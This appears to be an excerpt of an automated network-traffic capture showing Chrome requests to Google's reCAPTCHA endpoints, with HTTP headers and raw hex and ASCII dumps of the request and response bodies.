                                                                                                                          2024-12-19 16:08:51 UTC1390INData Raw: 3b 61 76 48 33 26 71 91 8c 60 75 1c 8f 71 59 ad 7c c3 66 92 57 5f a9 14 cf b3 51 79 54 18 83 e4 b3 42 4a bb 03 9e 70 09 24 e7 18 e8 32 3f 3a ff 00 24 a8 5d 4c 4b 6c c9 9c a3 00 0b 81 80 c3 a7 04 ab 0c 67 1d 7d aa 6b bf 26 e6 db 63 22 e3 22 55 cb 74 c1 73 82 38 1f c5 81 d4 7e f0 1f ac 06 61 1c a2 08 e4 f2 a1 cc 7b 09 70 1f e6 5c b6 73 82 3e f6 73 83 f4 19 38 57 b4 7d 05 17 2d 10 f1 24 e2 c5 cc f6 d2 01 09 65 20 e6 36 45 da 08 53 c7 40 4e 3e 5f ef 1e 39 e5 8e 88 ec 90 f9 e0 49 33 16 52 58 a8 24 0e 3f de c6 70 39 1d 46 33 9a 8a f1 63 8e 59 61 92 66 54 94 bc 8a 18 1e 06 e6 c1 c7 1c e0 e7 07 fb a3 bd 2c 7e 68 ba 9e 34 67 8c 65 9d 55 a3 3f 23 ed 24 83 f5 cf 00 90 30 16 b4 5d d7 50 7a cb 9b fa ed f9 87 fa 3d c4 98 85 96 31 21 ca 2a cc 19 f9 dc 40 c6 30 40 e3 91
                                                                                                                          Data Ascii: ;avH3&q`uqY|fW_QyTBJp$2?:$]LKlg}k&c""Uts8~a{p\s>s8W}-$e 6ES@N>_9I3RX$?p9F3cYafT,~h4geU?#$0]Pz=1!*@0@
                                                                                                                          2024-12-19 16:08:51 UTC1390INData Raw: 6c e4 29 19 18 3c 72 00 e7 9c d6 75 ac 65 99 2d d6 69 51 5a 31 b0 1e 42 92 38 f9 81 39 e4 83 df 80 4d 58 9c db 88 45 aa 33 31 96 72 b1 c9 b4 aa b4 9c b1 ea 4e 38 c6 09 1c fb f3 50 a9 db 24 c4 16 69 17 00 07 6d bb 72 87 73 0c e7 20 10 09 cf 23 00 d6 f1 5a 35 b1 71 b2 5f f0 17 f5 fa fe 42 ab ba 5c 98 a3 59 5a e9 76 06 05 b2 56 40 7e f2 65 b0 14 1c 1c 7f b8 41 35 25 9d cc 01 24 8e 24 32 05 6d a8 63 c0 75 ce 3f 78 09 c0 e1 80 c9 39 24 6d e8 7a d6 b8 85 a4 8a 2b 70 c2 45 84 ba 48 03 6d 11 70 c3 a0 c8 27 2d 93 91 ef dc d3 1a 70 6e 1d fc e6 08 e5 59 80 19 c3 ee 3c 67 a1 c9 c7 1b 87 23 35 a3 49 87 2f 34 4d 99 ee d3 ed 91 4a c6 20 4e c8 98 29 df c6 ec 8c 00 17 df e6 c7 a7 6e a9 a7 5d cd 69 a4 0d 42 ce 56 8a e8 5d 06 74 12 29 6c 2e 48 fd d9 07 f8 81 fb de dc 77 ac
                                                                                                                          Data Ascii: l)<rue-iQZ1B89MXE31rN8P$imrs #Z5q_B\YZvV@~eA5%$$2mcu?x9$mz+pEHmp'-pnY<g#5I/4MJ N)n]iBV]t)l.Hw
                                                                                                                          2024-12-19 16:08:51 UTC1390INData Raw: 7b 23 e9 f5 cd 15 0d ac f6 c2 33 18 b9 80 2c 67 68 32 dc 3a b3 0c 67 27 9e 7a f5 ef 45 70 ca 53 4e c9 bf b9 0b da 46 1a 73 b5 f2 27 b8 94 ad ba 98 64 fb 3e c3 b2 52 b8 00 92 0e ee 8d f5 18 1e 9c f6 ce 5e a3 aa 97 4f 2a 3c b2 ee dd 96 38 f3 18 f7 f9 70 71 90 39 fa f5 e9 55 ef ef 12 e2 e4 4a a8 a2 19 32 59 49 08 ca b9 63 82 a0 e4 0f 98 fe 1e b5 9f 26 e6 40 40 4c 73 85 23 2a 00 c7 50 33 8c 71 91 d7 9f 4a ec 85 18 f5 5b 7f 5f d6 c3 7c bf 0f 4f eb fa f3 27 45 ba b9 6c 20 79 64 2c c0 02 dc 01 d3 1d 08 fc c7 35 6f 0e ac 10 06 5c 9c ab aa 80 c5 b9 27 e6 f5 c6 0f 6e 7b d4 6e ef 06 63 52 45 d4 d9 2e d3 01 f2 ee e3 20 e3 82 71 f9 74 a6 88 4e c9 23 0d 0c 32 6d 06 37 20 63 19 cf 20 f4 e7 23 93 d4 0a 15 df bc f4 14 6f b7 7f eb fa ef e4 3a fe 44 60 cc 25 1b 4e 15 90 03
                                                                                                                          Data Ascii: {#3,gh2:g'zEpSNFs'd>R^O*<8pq9UJ2YIc&@@Ls#*P3qJ[_|O'El yd,5o\'n{ncRE. qtN#2m7 c #o:D`%N
                                                                                                                          2024-12-19 16:08:51 UTC304INData Raw: c9 1d 4e 3d cd 14 52 7b 33 16 ad 4d bf 5f c9 16 74 c7 fb 42 41 26 d5 8c 85 44 da 83 e5 fb a4 83 83 9e 47 6a 5b cf dd 31 fe 33 17 96 ca 5f 93 f3 92 48 3e bc 80 7d 78 a2 8a 56 56 bf a7 e6 cc 29 af 79 19 ef 34 93 47 1d bb b9 29 71 30 86 4f 52 a0 71 cf 5e bc d4 b7 13 3c 31 23 42 c6 31 20 60 50 12 54 6d 52 06 01 cf 4c 9a 28 ab 49 73 5b c9 fe a5 47 e2 f9 3f c8 bb a5 3f 9c 6d 24 28 88 56 e0 05 08 31 8f 97 24 8f 4c 93 9f c0 55 8b 1d ba 8d ec 62 e1 14 29 dc 08 5f 68 c3 8e be 85 46 0f 5a 28 ac 5e 95 1b 5d 97 e6 53 76 82 7e bf a9 5e d5 9a 69 ec d1 dd c9 9e 21 2c 8e 5c 96 24 2a 9e a4 9c 0c 93 50 5b 05 9a 64 8d 94 2a 1b 55 99 95 78 dc c4 a8 3c f5 c7 b0 c5 14 55 df dd 7f 33 28 6a e3 7f 3f cd 96 a4 4c 45 a9 ce 19 83 c4 8c a0 83 f7 b9 07 9a 8c b0 8e d9 e5 44 50 f0 c8 42
                                                                                                                          Data Ascii: N=R{3M_tBA&DGj[13_H>}xVV)y4G)q0ORq^<1#B1 `PTmRL(Is[G??m$(V1$LUb)_hFZ(^]Sv~^i!,\$*P[d*Ux<U3(j?LEDPB
                                                                                                                          2024-12-19 16:08:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          33192.168.2.1649773172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:52 UTC998OUTPOST /recaptcha/api2/replaceimage?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 5965
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://www.google.com
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:52 UTC5965OUTData Raw: 76 3d 6e 68 61 6d 68 66 41 36 6e 5f 68 4b 4d 61 5f 59 37 55 70 46 79 41 33 37 26 63 3d 30 33 41 46 63 57 65 41 35 41 71 66 64 63 55 75 49 65 7a 6c 5f 58 67 76 73 5f 58 48 45 30 4a 33 6b 57 50 45 4f 7a 30 2d 77 63 4e 6c 65 69 57 6b 48 57 31 71 4a 44 34 70 65 77 6d 34 5f 68 54 52 76 6a 36 2d 46 5a 71 2d 42 54 42 74 76 43 47 4b 4c 54 54 73 33 75 73 63 31 47 54 37 52 77 6b 2d 6d 4a 39 6d 76 69 4c 4c 47 43 70 50 69 65 7a 32 36 65 63 49 37 66 49 6e 52 7a 39 59 63 6c 68 54 48 71 54 62 71 4e 63 64 51 77 53 4c 77 33 46 77 41 46 33 73 4a 37 38 4c 5a 71 69 6f 52 34 5a 6c 64 6d 44 32 6b 6e 33 30 37 75 43 70 65 57 6e 46 72 47 44 6d 48 71 47 30 6f 6a 58 32 6e 42 52 6b 76 66 77 7a 4a 73 42 56 43 50 49 6b 70 6e 65 38 55 6d 69 44 4d 6a 5f 56 62 57 73 64 2d 43 2d 4d 33 71
                                                                                                                          Data Ascii: v=nhamhfA6n_hKMa_Y7UpFyA37&c=03AFcWeA5AqfdcUuIezl_Xgvs_XHE0J3kWPEOz0-wcNleiWkHW1qJD4pewm4_hTRvj6-FZq-BTBtvCGKLTTs3usc1GT7Rwk-mJ9mviLLGCpPiez26ecI7fInRz9YclhTHqTbqNcdQwSLw3FwAF3sJ78LZqioR4ZldmD2kn307uCpeWnFrGDmHqG0ojX2nBRkvfwzJsBVCPIkpne8UmiDMj_VbWsd-C-M3q
                                                                                                                          2024-12-19 16:08:53 UTC670INHTTP/1.1 200 OK
                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:53 GMT
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:08:53 UTC720INData Raw: 31 38 32 35 0d 0a 29 5d 7d 27 0a 5b 22 64 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 35 2d 4f 79 4c 6d 78 6c 7a 79 46 31 73 77 4f 6a 4a 39 61 38 69 5f 6e 45 4b 69 7a 43 74 68 36 56 34 35 41 32 42 7a 6a 75 54 53 69 4b 59 61 6f 71 62 4f 54 42 62 75 64 68 66 71 53 74 2d 58 63 72 48 41 50 35 6b 44 67 65 62 33 33 44 64 36 76 31 36 65 51 77 39 5a 35 43 63 44 41 6c 78 43 6b 41 4d 4a 6c 50 72 72 55 69 62 55 38 47 48 52 30 6a 34 58 48 33 77 6a 45 58 52 4e 4c 64 68 41 65 76 74 39 57 43 39 70 76 32 2d 77 4f 59 6a 62 31 44 58 45 6a 2d 75 67 38 79 72 56 56 78 63 49 5f 6c 52 4e 30 72 6d 57 78 6c 4f 66 70 4b 56 42 37 59 5a 38 64 48 70 38 31 57 4c 32 76 41 70 6c 52 34 41 52 59 54 6e 42 54 65 2d 48 71 43 74 57 55 39 58 53 73 38 33 4a 43 62 43 65 30 2d 2d 37 78 53 35 31
                                                                                                                          Data Ascii: 1825)]}'["dresp","03AFcWeA5-OyLmxlzyF1swOjJ9a8i_nEKizCth6V45A2BzjuTSiKYaoqbOTBbudhfqSt-XcrHAP5kDgeb33Dd6v16eQw9Z5CcDAlxCkAMJlPrrUibU8GHR0j4XH3wjEXRNLdhAevt9WC9pv2-wOYjb1DXEj-ug8yrVVxcI_lRN0rmWxlOfpKVB7YZ8dHp81WL2vAplR4ARYTnBTe-HqCtWU9XSs83JCbCe0--7xS51
                                                                                                                          2024-12-19 16:08:53 UTC1390INData Raw: 72 73 72 4c 4f 61 5a 6c 79 46 47 6f 4f 58 4a 37 53 71 37 42 54 49 49 5a 6f 6c 4e 50 4e 66 37 32 61 49 51 79 41 51 32 4d 58 59 58 46 38 64 35 6a 5a 54 72 53 63 54 76 74 75 78 74 4f 5a 79 5a 45 39 41 77 31 6f 32 4e 39 41 47 6e 68 36 36 63 4b 71 36 69 36 47 6f 53 4b 73 70 52 45 6f 53 30 47 30 79 46 75 57 6a 41 5a 73 71 6d 2d 35 54 41 32 6e 33 67 54 42 63 44 63 77 30 59 54 4b 38 73 79 58 54 35 66 30 6c 55 74 79 36 74 55 4b 64 41 64 4c 64 50 6c 51 72 41 5f 50 76 47 61 2d 67 5a 63 56 7a 57 36 51 4d 51 7a 6a 42 61 4f 6b 50 4d 55 54 35 79 5f 46 50 32 4b 53 68 4b 74 67 4e 42 6c 44 6f 49 4a 51 65 32 4d 6f 43 50 66 63 63 6d 79 2d 37 56 73 79 53 74 54 46 5a 34 53 4d 47 55 62 7a 4b 43 32 38 72 6c 6f 62 6e 62 6f 79 78 4a 56 6d 46 30 7a 6f 43 48 6d 5f 71 5a 5a 7a 69 6a
                                                                                                                          Data Ascii: rsrLOaZlyFGoOXJ7Sq7BTIIZolNPNf72aIQyAQ2MXYXF8d5jZTrScTvtuxtOZyZE9Aw1o2N9AGnh66cKq6i6GoSKspREoS0G0yFuWjAZsqm-5TA2n3gTBcDcw0YTK8syXT5f0lUty6tUKdAdLdPlQrA_PvGa-gZcVzW6QMQzjBaOkPMUT5y_FP2KShKtgNBlDoIJQe2MoCPfccmy-7VsyStTFZ4SMGUbzKC28rlobnboyxJVmF0zoCHm_qZZzij
                                                                                                                          2024-12-19 16:08:53 UTC1390INData Raw: 73 65 6f 42 4f 6d 6a 38 50 42 4c 33 32 46 4e 58 4f 73 71 6d 78 56 5a 6f 54 4c 45 62 71 4f 59 47 64 31 6f 33 78 30 62 69 47 77 56 2d 70 52 58 4e 38 39 70 6f 30 53 4e 56 67 4e 62 36 66 48 62 31 4b 70 46 45 62 6f 75 77 48 33 4b 6f 33 33 70 30 71 74 4a 5f 47 65 43 75 50 31 4a 4d 79 76 58 59 45 77 66 68 73 68 39 53 6c 6b 32 68 6b 48 47 61 49 41 51 70 64 55 36 72 32 78 57 69 75 6d 57 6e 59 61 68 37 76 76 33 37 56 4b 54 6c 77 6e 2d 54 32 6a 45 65 41 30 6b 70 67 70 57 47 6e 35 70 4b 37 77 75 53 67 4f 73 6a 31 43 4f 6a 4d 6a 34 47 65 4f 50 77 4a 71 71 69 2d 44 54 5f 31 50 44 51 65 53 48 67 75 4a 4b 36 6e 38 6c 74 63 63 6a 57 34 2d 50 4a 44 42 54 75 31 51 6b 4e 39 7a 49 55 65 57 52 6e 53 50 58 49 70 46 78 49 2d 73 4f 65 37 38 5a 62 41 6c 59 79 77 53 6f 4e 47 4e 45
                                                                                                                          Data Ascii: seoBOmj8PBL32FNXOsqmxVZoTLEbqOYGd1o3x0biGwV-pRXN89po0SNVgNb6fHb1KpFEbouwH3Ko33p0qtJ_GeCuP1JMyvXYEwfhsh9Slk2hkHGaIAQpdU6r2xWiumWnYah7vv37VKTlwn-T2jEeA0kpgpWGn5pK7wuSgOsj1COjMj4GeOPwJqqi-DT_1PDQeSHguJK6n8ltccjW4-PJDBTu1QkN9zIUeWRnSPXIpFxI-sOe78ZbAlYywSoNGNE
                                                                                                                          2024-12-19 16:08:53 UTC1390INData Raw: 46 41 72 64 6e 71 71 79 6b 50 63 71 45 74 4c 63 31 49 62 42 41 71 38 6a 65 4e 48 33 69 39 48 6c 55 46 57 7a 34 47 73 61 79 78 4d 38 38 2d 4d 4a 4f 51 36 56 57 45 4a 64 4b 6d 4c 5f 6f 34 2d 70 4a 73 34 2d 32 59 5a 6e 6c 78 78 4c 4b 56 35 78 2d 4a 48 4a 63 45 6a 42 63 41 59 5f 51 78 75 7a 68 50 77 64 76 74 48 49 53 43 58 79 45 56 58 51 45 6e 32 78 42 2d 77 48 34 55 41 7a 79 34 70 39 66 31 46 52 47 46 38 55 66 4f 6b 52 67 49 6e 68 62 77 52 2d 30 4a 6d 4c 54 5f 38 6c 6f 38 65 79 45 64 56 55 53 64 63 78 41 34 4d 55 4f 62 47 62 6a 62 73 42 45 79 64 52 59 46 54 38 6f 69 35 67 49 34 31 71 43 4c 50 78 33 48 6a 45 61 4c 5a 58 64 42 6f 37 45 2d 39 72 68 30 4f 75 30 52 6b 2d 6d 4e 4a 42 37 65 4f 57 6f 4f 43 46 35 70 38 65 76 4b 59 4a 72 38 62 4f 74 44 6d 69 59 4e 38
                                                                                                                          Data Ascii: FArdnqqykPcqEtLc1IbBAq8jeNH3i9HlUFWz4GsayxM88-MJOQ6VWEJdKmL_o4-pJs4-2YZnlxxLKV5x-JHJcEjBcAY_QxuzhPwdvtHISCXyEVXQEn2xB-wH4UAzy4p9f1FRGF8UfOkRgInhbwR-0JmLT_8lo8eyEdVUSdcxA4MUObGbjbsBEydRYFT8oi5gI41qCLPx3HjEaLZXdBo7E-9rh0Ou0Rk-mNJB7eOWoOCF5p8evKYJr8bOtDmiYN8
                                                                                                                          2024-12-19 16:08:53 UTC1299INData Raw: 4e 34 74 76 77 46 62 6c 37 65 4c 6c 68 44 58 43 4a 66 67 39 41 35 46 41 4e 58 73 75 52 30 39 61 76 59 53 68 32 73 30 6d 52 36 33 74 79 65 4a 6f 6c 6a 55 73 55 57 74 4a 55 6f 56 6a 39 57 6f 36 44 79 70 57 64 31 61 2d 4a 67 76 51 67 69 6d 49 79 7a 54 57 75 4a 31 59 44 43 78 63 36 79 6e 51 63 36 75 74 45 31 47 41 6a 55 50 30 35 2d 30 56 5f 4c 61 48 44 45 51 31 6a 73 70 79 76 43 6f 48 69 73 6f 30 65 51 76 6c 56 44 51 6c 69 58 39 69 36 7a 39 57 51 4d 70 32 67 57 6e 35 57 2d 6d 58 75 32 55 52 66 6a 78 5a 53 45 55 75 70 43 42 33 45 67 4a 42 53 44 71 4d 59 4c 7a 36 6c 72 4d 5a 55 52 42 39 4d 31 6d 54 68 34 77 32 36 69 6c 34 33 63 65 46 38 70 38 30 77 68 65 66 58 77 72 75 6c 70 34 6e 56 54 43 4b 30 6c 59 79 4d 54 33 57 39 30 6b 43 68 59 54 42 6a 31 52 35 42 65 6d
                                                                                                                          Data Ascii: N4tvwFbl7eLlhDXCJfg9A5FANXsuR09avYSh2s0mR63tyeJoljUsUWtJUoVj9Wo6DypWd1a-JgvQgimIyzTWuJ1YDCxc6ynQc6utE1GAjUP05-0V_LaHDEQ1jspyvCoHiso0eQvlVDQliX9i6z9WQMp2gWn5W-mXu2URfjxZSEUupCB3EgJBSDqMYLz6lrMZURB9M1mTh4w26il43ceF8p80whefXwrulp4nVTCK0lYyMT3W90kChYTBj1R5Bem
                                                                                                                          2024-12-19 16:08:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          34192.168.2.1649775172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:55 UTC1168OUTGET /recaptcha/api2/payload?p=06AFcWeA66jB7Squ_efAQ1wl69XvRCJnpngzp_HWY6p3QFWdpg9CSxF6n8e9Vd_f3cJlGjPL8O_bkiSrZ7aG8CyOoTTaO-BMrEv1mTwgfYMQg5KpsEHcwT5DN8II4CvzDez8m-ComcFHSSGm8wYXoICd6Wc3d4nwC2Jw1qKll4aNf78GGwJDKE66wVBQMV-eZZAlJBg24rXajW&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE&id=23ea9996fd440bbf HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:55 UTC681INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Expires: Thu, 19 Dec 2024 16:08:55 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:55 GMT
                                                                                                                          Cache-Control: private, max-age=30
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2024-12-19 16:08:55 UTC709INData Raw: 31 36 34 30 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                          Data Ascii: 1640JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                          2024-12-19 16:08:55 UTC1390INData Raw: 35 d4 c9 21 64 58 44 77 11 6d 25 f3 b0 b6 70 41 cf 18 19 07 38 fc 33 d2 b5 ad 2f 69 2d 1e e6 74 29 c9 45 46 4b cc f3 6f 8c b7 2b 66 f6 53 c9 66 f2 ce 5f cb 8a 63 20 70 bc 61 c1 eb 8e 70 4f 19 e9 df 38 f3 25 74 49 6e 15 b0 e5 90 85 11 f4 50 54 00 48 27 27 0a 0f 20 1c 9f a9 15 f4 4e b5 a4 d9 ea 08 8f ab 29 92 14 00 2c 61 89 4d ac 30 32 41 03 8e 0f 4f 7e f5 e2 de 3b d0 6e 3c 33 ac b2 aa c6 2d e4 97 7c 4a 4e 3e 50 78 00 b7 52 14 63 03 8e 3d eb af 0b 56 32 8f 2a dd af bf af dc 71 e2 29 6b ce ba ff 00 9f f5 b7 cc f3 df 1a 9d 2d cc 3f 6b 79 4c f7 20 c8 cd 0c 7c ec 3b 88 5e 30 32 4e 00 fe ea fe 55 53 51 d7 ad f4 6b 2b 2b 4d 2d 59 66 b8 84 fd a4 90 52 32 fc e1 46 0f 1b 57 e5 cf 5c 93 d4 62 ba 4b db 3b 3b b0 d7 45 5c 3a 46 fe 56 59 d8 6e c9 db 83 f7 8f 1b 48 c1 e8
                                                                                                                          Data Ascii: 5!dXDwm%pA83/i-t)EFKo+fSf_c papO8%tInPTH'' N),aM02AO~;n<3-|JN>PxRc=V2*q)k-?kyL |;^02NUSQk++M-YfR2FW\bK;;E\:FVYnH
                                                                                                                          2024-12-19 16:08:55 UTC1390INData Raw: cc 40 39 50 41 04 80 01 18 f5 c8 fc 5a a0 9b 08 24 13 ac 52 c9 9d b1 c8 4b 67 20 fc d8 1c 29 1b f1 c0 c7 cd f9 cf f6 68 e2 11 13 6e 18 a3 96 6f 97 62 0c fc d9 1b 4f 23 e5 03 9e 06 3a 55 73 ad b7 6e ff 00 d7 f5 72 79 be ca d5 fe 3b ff 00 5d fd 34 29 08 bc c6 77 31 40 49 6c e0 3b 0c 7b 75 e7 f0 a2 a6 10 b5 c3 bb a6 9e 5d 41 0a 19 da 48 4b 00 a0 03 85 38 e9 8e 79 3e f4 52 95 59 c5 d9 46 ff 00 7f f9 94 a3 87 7f 13 d7 d1 9a 37 93 49 b6 49 9d ae 04 fe 50 56 65 8d 8b ed 19 24 1d a4 ff 00 77 ae 48 e7 19 c6 69 b2 49 32 c6 44 36 ab 9f 30 01 e5 39 44 dc 79 da 02 f6 07 2c 33 c7 1e 9c d4 d7 53 ae d7 8a ed 21 7f de 96 65 12 2c 7b 4f 0b ca 9e 99 0c 3a e4 7d 01 c5 57 b8 fb 5a dc 94 71 f6 89 23 cc 8e 92 6e 0b 23 01 9e bc 12 41 c9 03 db 1d f0 05 08 d9 2d bf af 90 e0 9d 92
                                                                                                                          Data Ascii: @9PAZ$RKg )hnobO#:Usnry;]4)w1@Il;{u]AHK8y>RYF7IIPVe$wHiI2D609Dy,3S!e,{O:}WZq#n#A-
                                                                                                                          2024-12-19 16:08:55 UTC1390INData Raw: ac 90 e1 6d 18 ac 7b be f0 63 f3 7c c3 83 c8 dc dc 11 82 08 ce 07 7c d2 ac 91 46 a6 76 d8 a8 a5 02 0c 90 a4 61 89 24 63 e6 5d cb f7 73 d8 f4 0d 52 a2 9d d0 a4 5e 51 92 37 11 ac 72 0e 24 3f c4 9c e0 e0 fd 3b 62 96 40 93 dc a6 37 cd 78 91 6c 91 77 8c ca 07 00 0e f8 da 0f ae 7d 46 2b a9 be fb 9c 8e e9 d9 ef fd 7f 5f 81 16 a2 21 49 bc b9 24 b6 65 03 cc 5f dd 8d e3 aa 03 bb 69 db d3 23 3d 81 cf 15 1d 8c b0 4b 20 7b 2b 92 16 22 a9 0b 2c b9 27 e7 2a 55 b2 38 1b 77 73 da a5 96 e9 6e 2d 6e 56 56 f2 91 65 f2 fe 52 a4 44 01 04 10 dc 67 a9 e7 d7 3c 11 4b 2c d2 4d 78 c1 84 b0 3c a5 b8 79 5b 73 00 71 8c 83 cf dd e3 81 c9 ed 8c 03 95 a5 6f eb fe 1f fa ec 27 0e 45 af 4d fc ff 00 af eb 41 91 5a d9 dc 34 93 c9 62 a5 99 fb 94 88 00 00 00 0c 9e 40 00 0c fa e4 76 a2 ad 5b db
                                                                                                                          Data Ascii: m{c||Fva$c]sR^Q7r$?;b@7xlw}F+_!I$e_i#=K {+",'*U8wsn-nVVeRDg<K,Mx<y[sqo'EMAZ4b@v[
